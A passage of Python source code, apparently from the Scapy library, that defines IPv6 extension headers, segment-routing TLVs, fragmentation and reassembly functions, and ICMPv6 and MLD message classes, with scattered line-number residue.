                                 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)]  # noqa: E501
    overload_fields = {IPv6: {"nh": 0}}
863
864
865#                        Destination Option Header                          #
866
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    # Destination Options extension header. When placed on top of IPv6, it
    # overloads the IPv6 'nh' field with 60.
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   # len: options length plus the 2 leading bytes, rounded up
                   # to 8-octet units, minus one unit
                   FieldLenField("len", None, length_of="options", fmt="B",
                                 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
                   # options start at offset 2 (curpos argument); on
                   # dissection their length is derived back from 'len'
                   _OptionsField("options", [], HBHOptUnknown, 2,
                                 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)]  # noqa: E501
    overload_fields = {IPv6: {"nh": 60}}
876
877
878#                             Routing Header                                #
879
class IPv6ExtHdrRouting(_IPv6ExtHdr):
    # Routing extension header carrying a list of IPv6 addresses. When
    # placed on top of IPv6, it overloads the IPv6 'nh' field with 43.
    name = "IPv6 Option Header Routing"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   FieldLenField("len", None, count_of="addresses", fmt="B",
                                 adjust=lambda pkt, x: 2 * x),  # in 8 bytes blocks  # noqa: E501
                   ByteField("type", 0),
                   ByteField("segleft", None),
                   BitField("reserved", 0, 32),  # There is meaning in this field ...  # noqa: E501
                   IP6ListField("addresses", [],
                                length_from=lambda pkt: 8 * pkt.len)]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Fill 'segleft' with the number of addresses when it is unset."""
        if self.segleft is not None:
            return _IPv6ExtHdr.post_build(self, pkt, pay)
        # 'segleft' is the 4th byte of the header
        segleft = struct.pack("B", len(self.addresses))
        patched = pkt[:3] + segleft + pkt[4:]
        return _IPv6ExtHdr.post_build(self, patched, pay)
896
897
898#                         Segment Routing Header                            #
899
900# This implementation is based on RFC8754, but some older snippets come from:
901# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
902
# Segment Routing Header TLV type value -> display name, used as the enum
# of the 'type' field of the TLV classes.
_segment_routing_header_tlvs = {
    # RFC 8754 sect 8.2
    0: "Pad1 TLV",
    1: "Ingress Node TLV",  # draft 06
    2: "Egress Node TLV",  # draft 06
    4: "PadN TLV",
    5: "HMAC TLV",
}
911
912
class IPv6ExtHdrSegmentRoutingTLV(Packet):
    # Generic type/len/value TLV; also the base class of the specific TLV
    # classes, which are looked up by type in 'registered_sr_tlv'.
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    # RFC 8754 sect 2.1
    fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
                   ByteField("len", 0),
                   StrLenField("value", "", length_from=lambda pkt: pkt.len)]

    # TLV type value -> class registered for it (shared by all subclasses)
    registered_sr_tlv = {}

    def extract_padding(self, p):
        """Return ``(b"", p)``: nothing is kept, ``p`` is handed back whole."""
        kept = b""
        return kept, p

    @classmethod
    def register_variant(cls):
        """Register ``cls`` under the default value of its 'type' field."""
        tlv_type = cls.type.default
        cls.registered_sr_tlv[tlv_type] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        """Pick the class to dissect ``pkt`` with, from its first byte.

        Falls back to ``cls`` when ``pkt`` is empty/missing or when no class
        is registered for that type.
        """
        if not pkt:
            return cls
        return cls.registered_sr_tlv.get(ord(pkt[:1]), cls)
935
936
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    # TLV of type 1 carrying one IPv6 address ('ingress_node').
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.1
    fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
                   # fixed default; not recomputed from the other fields
                   ByteField("len", 18),
                   ByteField("reserved", 0),
                   ByteField("flags", 0),
                   IP6Field("ingress_node", "::1")]
945
946
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    # TLV of type 2 carrying one IPv6 address ('egress_node').
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.2
    fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
                   # fixed default; not recomputed from the other fields
                   ByteField("len", 18),
                   ByteField("reserved", 0),
                   ByteField("flags", 0),
                   IP6Field("egress_node", "::1")]
955
956
class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
    # TLV of type 0, modelled here with a 'len' byte (computed from
    # 'padding' when left to None) followed by the 'padding' bytes.
    # NOTE(review): RFC 8754 sect 2.1.1.1 describes Pad1 as a single octet
    # without length or value; with the defaults below this class builds
    # more than one byte. To be confirmed before relying on it for padding.
    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
    # RFC8754 sect 2.1.1.1
    fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="padding", fmt="B"),
                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
963
964
class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
    # TLV of type 4: a 'len' byte (computed from 'padding' when left to
    # None) followed by the 'padding' bytes.
    name = "IPv6 Option Header Segment Routing - PadN TLV"
    # RFC8754 sect 2.1.1.2
    fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="padding", fmt="B"),
                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
971
972
class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
    # TLV of type 5: D bit, 15 reserved bits, a key identifier and a
    # variable-length HMAC.
    name = "IPv6 Option Header Segment Routing - HMAC TLV"
    # RFC8754 sect 2.1.2
    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
                   # The TLV length is a single byte (fmt="B", like the other
                   # TLVs) counting what follows it, in bytes: D/reserved (2)
                   # + hmackeyid (4) + hmac, hence the offset of 6.
                   FieldLenField("len", None, length_of="hmac", fmt="B",
                                 adjust=lambda _, x: x + 6),
                   BitField("D", 0, 1),
                   BitField("reserved", 0, 15),
                   IntField("hmackeyid", 0),
                   StrLenField("hmac", "",
                               length_from=lambda pkt: pkt.len - 6)]
984
985
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    # Segment Routing Header: a list of IPv6 addresses followed by optional
    # TLVs. When placed on top of IPv6, it overloads the IPv6 'nh' field
    # with 43. 'len', 'segleft' and 'lastentry' are computed in post_build()
    # when left to None.
    name = "IPv6 Option Header Segment Routing"
    # RFC8754 sect 2. + flag bits from draft 06
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteField("type", 4),
                   ByteField("segleft", None),
                   ByteField("lastentry", None),
                   BitField("unused1", 0, 1),
                   BitField("protected", 0, 1),
                   BitField("oam", 0, 1),
                   BitField("alert", 0, 1),
                   BitField("hmac", 0, 1),
                   BitField("unused2", 0, 3),
                   ShortField("tag", 0),
                   IP6ListField("addresses", ["::1"],
                                count_from=lambda pkt: (pkt.lastentry + 1)),
                   PacketListField("tlv_objects", [],
                                   IPv6ExtHdrSegmentRoutingTLV,
                                   length_from=lambda pkt: 8 * pkt.len - 16 * (
                                       pkt.lastentry + 1
                   ))]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Pad the header and fill in the fields left to None.

        - 'len': the header is first padded to a multiple of 8 bytes, then
          'len' is set to its size in 8-byte units, not counting the first 8.
        - 'segleft' and 'lastentry': set to the index of the last address
          (0 when the list is empty; a warning is emitted for 'lastentry').
        """
        if self.len is None:

            # The extension must be aligned on 8 bytes
            pad_len = -len(pkt) % 8
            if pad_len == 1:
                # A Pad1 TLV is a single zero octet (RFC 8754 sect 2.1.1.1).
                # Building IPv6ExtHdrSegmentRoutingTLVPad1() here would add
                # more than one byte and leave the header misaligned.
                pkt += b"\x00"
            elif pad_len >= 2:
                # PadN TLV: 2 bytes of type/len plus the padding itself
                tmp_pad = b"\x00" * (pad_len - 2)
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad))

            tmp_len = (len(pkt) - 8) // 8
            pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]

        if self.segleft is None:
            tmp_len = len(self.addresses)
            if tmp_len:
                tmp_len -= 1
            pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]

        if self.lastentry is None:
            lastentry = len(self.addresses)
            if lastentry == 0:
                warning(
                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
                )
            else:
                lastentry -= 1
            pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)
1046
1047
1048#                           Fragmentation Header                             #
1049
class IPv6ExtHdrFragment(_IPv6ExtHdr):
    # Fragment extension header. When placed on top of IPv6, it overloads
    # the IPv6 'nh' field with 44.
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

    def guess_payload_class(self, p):
        """Return Raw for non-first fragments, else defer to the parent.

        A fragment with a non-zero offset is never decoded further.
        """
        if self.offset > 0:
            return Raw
        return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1065
1066
def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
    Crap is dropped. What lacks is completed by 'X' characters.

    Only packets holding an IPv6ExtHdrFragment are considered, and among
    them only those sharing the fragment id of the first one (a warning is
    emitted when others are discarded). Fragments are sorted by offset; a
    gap between two fragments is filled with 'X' bytes, with a warning.

    Returns the reassembled packet, or an empty list when 'packets'
    contains no fragment.
    """

    # Remove non fragments
    lst = [x for x in packets if IPv6ExtHdrFragment in x]
    if not lst:
        return []

    frag_id = lst[0][IPv6ExtHdrFragment].id

    llen = len(lst)
    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == frag_id]
    if len(lst) != llen:
        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501

    # reorder fragments by increasing offset (sorted() is stable, so
    # fragments with equal offsets keep their relative order)
    res = sorted(lst, key=lambda p: p[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset  # the offset field counts 8-byte units
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
        # adds nothing when the fragment does not start past the data so far
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)

    # Regenerate the unfragmentable part.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    # The layer under the fragment header takes over its next header value
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)
    del(q.plen)

    # Rebuild and re-dissect the IPv6 part so that upper layers get decoded
    if q[IPv6].underlayer:
        q[IPv6] = IPv6(raw(q[IPv6]))
    else:
        q = IPv6(raw(q))
    return q
1122
1123
def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
    expected maximum size of fragment data (MTU). The list of packets is
    returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is added to
    first IPv6 layer found. If no IPv6 layer exists packet is returned in
    result list unmodified.

    'fragSize' is compared against the size of the whole built packet.
    The function works on a copy of 'pkt'. Special cases:
    - an empty list is returned (with a warning) when the fragment header
      and what follows it exceed 65535 bytes;
    - the packet is returned alone when it already fits in 'fragSize';
    - the packet is returned alone, unfragmented (with a warning), when
      'fragSize' leaves no room for at least 8 bytes of data per fragment.
    """

    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        if IPv6 not in pkt:
            return [pkt]

        # Insert a fragment header between the IPv6 layer and its payload
        layer3 = pkt[IPv6]
        data = layer3.payload
        frag = IPv6ExtHdrFragment(nh=layer3.nh)

        layer3.remove_payload()
        # Reset nh and plen so they are recomputed for the new layout
        del(layer3.nh)
        del(layer3.plen)

        frag.add_payload(data)
        layer3.add_payload(frag)

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
        return []

    s = raw(pkt)  # for instantiation to get upper layer checksum right

    if len(s) <= fragSize:
        return [pkt]

    # Fragmentable part : fake IPv6 for Fragmentable part length computation
    fragPart = pkt[IPv6ExtHdrFragment].payload
    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
    fragPartLen = len(tmp) - 40  # basic IPv6 header length
    # The fragmentable bytes are taken from the real build (s), not from tmp
    fragPartStr = s[-fragPartLen:]

    # Grab Next Header for use in Fragment Header
    nh = pkt[IPv6ExtHdrFragment].nh

    # Keep fragment header
    fragHeader = pkt[IPv6ExtHdrFragment]
    del fragHeader.payload  # detach payload

    # Unfragmentable Part
    unfragPartLen = len(s) - fragPartLen - 8  # 8: size of the fragment header
    unfragPart = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. last Frag MTU
    # can be anything below MTU
    lastFragSize = fragSize - unfragPartLen - 8
    innerFragSize = lastFragSize - (lastFragSize % 8)

    if lastFragSize <= 0 or innerFragSize == 0:
        warning("Provided fragment size value is too low. " +
                "Should be more than %d" % (unfragPartLen + 8))
        return [unfragPart / fragHeader / fragPart]

    remain = fragPartStr
    res = []
    fragOffset = 0     # offset, incremented during creation
    fragId = random.randint(0, 0xffffffff)  # random id ...
    if fragHeader.id is not None:  # ... except id provided by user
        fragId = fragHeader.id
    fragHeader.m = 1
    fragHeader.id = fragId
    fragHeader.nh = nh

    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
    while True:
        if (len(remain) > lastFragSize):
            # Inner fragment: take innerFragSize bytes, more fragments follow
            tmp = remain[:innerFragSize]
            remain = remain[innerFragSize:]
            fragHeader.offset = fragOffset    # update offset
            fragOffset += (innerFragSize // 8)  # compute new one
            if IPv6 in unfragPart:
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
            res.append(tempo)
        else:
            # Last fragment: carries whatever remains, with the m flag cleared
            fragHeader.offset = fragOffset    # update offset
            fragHeader.m = 0
            if IPv6 in unfragPart:
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
            res.append(tempo)
            break
    return res
1222
1223
1224#############################################################################
1225#############################################################################
1226#                             ICMPv6* Classes                               #
1227#############################################################################
1228#############################################################################
1229
1230
# ICMPv6 type value -> name (as a string) of the class modelling that
# message. Types marked "Do Me" have no class yet.
icmp6typescls = {1: "ICMPv6DestUnreach",
                 2: "ICMPv6PacketTooBig",
                 3: "ICMPv6TimeExceeded",
                 4: "ICMPv6ParamProblem",
                 128: "ICMPv6EchoRequest",
                 129: "ICMPv6EchoReply",
                 130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
                 131: "ICMPv6MLReport",
                 132: "ICMPv6MLDone",
                 133: "ICMPv6ND_RS",
                 134: "ICMPv6ND_RA",
                 135: "ICMPv6ND_NS",
                 136: "ICMPv6ND_NA",
                 137: "ICMPv6ND_Redirect",
                 # 138: Do Me - RFC 2894 - Seems painful
                 139: "ICMPv6NIQuery",
                 140: "ICMPv6NIReply",
                 141: "ICMPv6ND_INDSol",
                 142: "ICMPv6ND_INDAdv",
                 143: "ICMPv6MLReport2",
                 144: "ICMPv6HAADRequest",
                 145: "ICMPv6HAADReply",
                 146: "ICMPv6MPSol",
                 147: "ICMPv6MPAdv",
                 # 148: Do Me - SEND related - RFC 3971
                 # 149: Do Me - SEND related - RFC 3971
                 151: "ICMPv6MRD_Advertisement",
                 152: "ICMPv6MRD_Solicitation",
                 153: "ICMPv6MRD_Termination",
                 # 154: Do Me - FMIPv6 Messages - RFC 5568
                 155: "ICMPv6RPL",  # RFC 6550
                 }
1263
# ICMPv6 type value -> integer. Judging by the name, this is the minimal
# header length (in bytes) expected for that type; the code using it is
# not in this part of the file -- to be confirmed there.
icmp6typesminhdrlen = {1: 8,
                       2: 8,
                       3: 8,
                       4: 8,
                       128: 8,
                       129: 8,
                       130: 24,
                       131: 24,
                       132: 24,
                       133: 8,
                       134: 16,
                       135: 24,
                       136: 24,
                       137: 40,
                       # 139:
                       # 140
                       141: 8,
                       142: 8,
                       143: 8,
                       144: 8,
                       145: 8,
                       146: 8,
                       147: 8,
                       151: 8,
                       152: 4,
                       153: 4,
                       155: 4
                       }
1292
# ICMPv6 type value -> human readable name, used as the enum of the
# 'type' field of the ICMPv6 classes.
icmp6types = {1: "Destination unreachable",
              2: "Packet too big",
              3: "Time exceeded",
              4: "Parameter problem",
              100: "Private Experimentation",
              101: "Private Experimentation",
              128: "Echo Request",
              129: "Echo Reply",
              130: "MLD Query",
              131: "MLD Report",
              132: "MLD Done",
              133: "Router Solicitation",
              134: "Router Advertisement",
              135: "Neighbor Solicitation",
              136: "Neighbor Advertisement",
              137: "Redirect Message",
              138: "Router Renumbering",
              139: "ICMP Node Information Query",
              140: "ICMP Node Information Response",
              141: "Inverse Neighbor Discovery Solicitation Message",
              142: "Inverse Neighbor Discovery Advertisement Message",
              143: "MLD Report Version 2",
              144: "Home Agent Address Discovery Request Message",
              145: "Home Agent Address Discovery Reply Message",
              146: "Mobile Prefix Solicitation",
              147: "Mobile Prefix Advertisement",
              148: "Certification Path Solicitation",
              149: "Certification Path Advertisement",
              151: "Multicast Router Advertisement",
              152: "Multicast Router Solicitation",
              153: "Multicast Router Termination",
              155: "RPL Control Message",
              200: "Private Experimentation",
              201: "Private Experimentation"}
1327
1328
class _ICMPv6(Packet):
    # Common base of the ICMPv6 classes: checksum computation and default
    # request/answer matching. When placed on top of IPv6, it overloads
    # the IPv6 'nh' field with 58.
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """Append the payload and fill in 'cksum' when it is unset.

        The checksum is computed by in6_chksum() over the message and its
        payload, and stored in bytes 2-3 of the message.
        """
        p += pay
        if self.cksum is not None:
            return p
        chksum = in6_chksum(58, self.underlayer, p)
        return p[:2] + struct.pack("!H", chksum) + p[4:]

    def hashret(self):
        """Delegate the hash to the payload."""
        return self.payload.hashret()

    def answers(self, other):
        """Return 1 when this message matches ``other``, else 0.

        Matching is only attempted when the underlayer is an IPerror6, or
        when it is an extension header and ``other`` is an ICMPv6 message;
        type and code must then both be equal.
        """
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        under = self.underlayer
        candidate = isinstance(under, IPerror6) or (
            isinstance(under, _IPv6ExtHdr) and isinstance(other, _ICMPv6)
        )
        if not candidate:
            return 0
        if self.type == other.type and self.code == other.code:
            return 1
        return 0
1353
1354
class _ICMPv6Error(_ICMPv6):
    # Base class of the ICMPv6 error messages.
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        """Always decode what follows as an IPerror6."""
        return IPerror6
1360
1361
class ICMPv6Unknown(_ICMPv6):
    # Fallback class: type, code and checksum followed by an opaque
    # message body.
    name = "Scapy6 ICMPv6 fallback class"
    fields_desc = [ByteEnumField("type", 1, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   StrField("msgbody", "")]
1368
1369
1370#                                  RFC 2460                                  #
1371
class ICMPv6DestUnreach(_ICMPv6Error):
    # ICMPv6 error message of type 1; 'code' gives the reason.
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [ByteEnumField("type", 1, icmp6types),
                   ByteEnumField("code", 0, {0: "No route to destination",
                                             1: "Communication with destination administratively prohibited",  # noqa: E501
                                             2: "Beyond scope of source address",  # noqa: E501
                                             3: "Address unreachable",
                                             4: "Port unreachable"}),
                   XShortField("cksum", None),  # None: computed at build time
                   ByteField("length", 0),
                   X3BytesField("unused", 0)]
1383
1384
class ICMPv6PacketTooBig(_ICMPv6Error):
    # ICMPv6 error message of type 2 carrying an 'mtu' value
    # (1280 by default).
    name = "ICMPv6 Packet Too Big"
    fields_desc = [ByteEnumField("type", 2, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),  # None: computed at build time
                   IntField("mtu", 1280)]
1391
1392
class ICMPv6TimeExceeded(_ICMPv6Error):
    # ICMPv6 error message of type 3; 'code' tells which limit was hit.
    name = "ICMPv6 Time Exceeded"
    fields_desc = [ByteEnumField("type", 3, icmp6types),
                   ByteEnumField("code", 0, {0: "hop limit exceeded in transit",  # noqa: E501
                                             1: "fragment reassembly time exceeded"}),  # noqa: E501
                   XShortField("cksum", None),  # None: computed at build time
                   ByteField("length", 0),
                   X3BytesField("unused", 0)]
1401
1402# The default pointer value is set to the next header field of
1403# the encapsulated IPv6 packet
1404
1405
class ICMPv6ParamProblem(_ICMPv6Error):
    # ICMPv6 error message of type 4; 'ptr' defaults to 6.
    name = "ICMPv6 Parameter Problem"
    fields_desc = [ByteEnumField("type", 4, icmp6types),
                   ByteEnumField(
                       "code", 0,
                       {0: "erroneous header field encountered",
                        1: "unrecognized Next Header type encountered",
                        2: "unrecognized IPv6 option encountered",
                        3: "first fragment has incomplete header chain"}),
                   XShortField("cksum", None),  # None: computed at build time
                   IntField("ptr", 6)]
1417
1418
class ICMPv6EchoRequest(_ICMPv6):
    # Echo Request (type 128): identifier, sequence number and
    # arbitrary data.
    name = "ICMPv6 Echo Request"
    fields_desc = [ByteEnumField("type", 128, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", 0),
                   XShortField("seq", 0),
                   StrField("data", "")]

    def mysummary(self):
        """Summarize the message with its id and sequence number."""
        summary_fmt = "%name% (id: %id% seq: %seq%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        """Hash on (id, seq), followed by the payload's own hash."""
        own_hash = struct.pack("HH", self.id, self.seq)
        return own_hash + self.payload.hashret()
1433
1434
class ICMPv6EchoReply(ICMPv6EchoRequest):
    # Echo Reply: same layout as the Echo Request, with type 129.
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        """Tell whether this reply answers the echo message ``other``.

        The identifier, the sequence number and the data must all match.
        """
        if not isinstance(other, ICMPv6EchoRequest):
            return False
        same_exchange = self.id == other.id and self.seq == other.seq
        return same_exchange and self.data == other.data
1444
1445
1446#            ICMPv6 Multicast Listener Discovery (RFC2710)                  #
1447
# All MLD messages are sent with a link-local source address
# -> post_build should make sure of it when none is specified
# The Hop-Limit value must be 1
1451# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1452# header. (The router alert option is necessary to cause routers to
1453# examine MLD messages sent to multicast addresses in which the router
1454# itself has no interest"
class _ICMPv6ML(_ICMPv6):
    # Field layout shared by the MLD Query, Report and Done classes.
    fields_desc = [ByteEnumField("type", 130, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),  # None: computed at build time
                   ShortField("mrd", 0),
                   ShortField("reserved", 0),
                   IP6Field("mladdr", "::")]
1462
1463# general queries are sent to the link-scope all-nodes multicast
1464# address ff02::1, with a multicast address field of 0 and a MRD of
1465# [Query Response Interval]
1466# Default value for mladdr is set to 0 for a General Query, and
1467# overloaded by the user for a Multicast Address specific query
1468# TODO : See what we can do to automatically include a Router Alert
1469#        Option in a Destination Option Header.
1470
1471
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    # MLD Query. When placed on top of IPv6, it overloads the IPv6 'dst'
    # (ff02::1), 'hlim' (1) and 'nh' (58) fields.
    name = "MLD - Multicast Listener Query"
    # Class-level values for fields declared in _ICMPv6ML (presumably
    # picked up as the field defaults -- see the Packet class)
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1478
1479
1480# TODO : See what we can do to automatically include a Router Alert
1481#        Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    # MLD Report. When placed on top of IPv6, it overloads the IPv6
    # 'hlim' (1) and 'nh' (58) fields.
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}

    def answers(self, query):
        """Check the query type

        A report answers any packet that contains an ICMPv6MLQuery layer.
        """
        return ICMPv6MLQuery in query
1490
1491# When a node ceases to listen to a multicast address on an interface,
1492# it SHOULD send a single Done message to the link-scope all-routers
1493# multicast address (FF02::2), carrying in its multicast address field
1494# the address to which it is ceasing to listen
1495# TODO : See what we can do to automatically include a Router Alert
1496#        Option in a Destination Option Header.
1497
1498
class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    # MLD Done. When placed on top of IPv6, it overloads the IPv6 'dst'
    # (ff02::2), 'hlim' (1) and 'nh' (58) fields.
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1503
1504
1505#            Multicast Listener Discovery Version 2 (MLDv2) (RFC3810)       #
1506
class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    # MLDv2 Query: the MLD query fields followed by flags, QQIC and a list
    # of source addresses whose count is stored in 'sources_number'.
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [ByteEnumField("type", 130, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ShortField("mrd", 10000),
                   ShortField("reserved", 0),
                   IP6Field("mladdr", "::"),
                   BitField("Resv", 0, 4),
                   BitField("S", 0, 1),
                   BitField("QRV", 0, 3),
                   ByteField("QQIC", 0),
                   ShortField("sources_number", None),
                   IP6ListField("sources", [],
                                count_from=lambda pkt: pkt.sources_number)]

    # RFC 3810 - 5. Message Formats
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is not None:
            return _ICMPv6.post_build(self, packet, payload)
        # 'sources_number' sits in bytes 26-27 of the message
        count = struct.pack("!H", len(self.sources))
        patched = packet[:26] + count + packet[28:]
        return _ICMPv6.post_build(self, patched, payload)
1532
1533
class ICMPv6MLDMultAddrRec(Packet):
    # One multicast address record of an MLDv2 report: a record type, a
    # multicast address ('dst'), a list of sources and auxiliary data.
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [ByteField("rtype", 4),
                   FieldLenField("auxdata_len", None,
                                 length_of="auxdata",
                                 fmt="B"),
                   # number of sources: byte length of 'sources' divided by
                   # 16, the size of one address
                   FieldLenField("sources_number", None,
                                 length_of="sources",
                                 adjust=lambda p, num: num // 16),
                   IP6Field("dst", "::"),
                   IP6ListField("sources", [],
                                length_from=lambda p: 16 * p.sources_number),
                   StrLenField("auxdata", "",
                               length_from=lambda p: p.auxdata_len)]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return self.__class__
1552
1553
class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
    # MLDv2 Report: a list of multicast address records whose count is
    # stored in 'records_number'.
    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [ByteEnumField("type", 143, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None),
                   ShortField("reserved", 0),
                   ShortField("records_number", None),
                   PacketListField("records", [],
                                   ICMPv6MLDMultAddrRec,
                                   count_from=lambda p: p.records_number)]

    # RFC 3810 - 5. Message Formats
    overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'records_number' field when needed"""
        if self.records_number is not None:
            return _ICMPv6.post_build(self, packet, payload)
        # 'records_number' sits in bytes 6-7 of the message
        count = struct.pack("!H", len(self.records))
        patched = packet[:6] + count + packet[8:]
        return _ICMPv6.post_build(self, patched, payload)

    def answers(self, query):
        """Check the query type"""
        is_v2_query = isinstance(query, ICMPv6MLQuery2)
        return is_v2_query
1578
1579
1580#          ICMPv6 MRD - Multicast Router Discovery (RFC 4286)               #
1581
1582# TODO:
1583# - 04/09/06 troglocan : find a way to automatically add a router alert
1584#            option for all MRD packets. This could be done in a specific
1585#            way when IPv6 is the under layer with some specific keyword
1586#            like 'exthdr'. This would allow to keep compatibility with
1587#            providing IPv6 fields to be overloaded in fields_desc.
1588#
1589#            At the moment, if user inserts an IPv6 Router alert option
1590#            none of the IPv6 default values of IPv6 layer will be set.
1591
class ICMPv6MRD_Advertisement(_ICMPv6):
    """Multicast Router Discovery Advertisement (ICMPv6 type 151)."""
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 151, icmp6types),
        ByteField("advinter", 20),
        XShortField("cksum", None),
        ShortField("queryint", 0),
        ShortField("robustness", 0),
    ]
    # The IPv6 Router Alert option is not added automatically: it
    # requires manual inclusion.
    # NOTE(review): RFC 4286 appears to send Advertisements to the
    # All-Snoopers group (ff02::6a) rather than ff02::2 -- confirm.
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}

    def extract_padding(self, s):
        """Split *s* after its first 8 bytes and return both parts."""
        split_at = 8
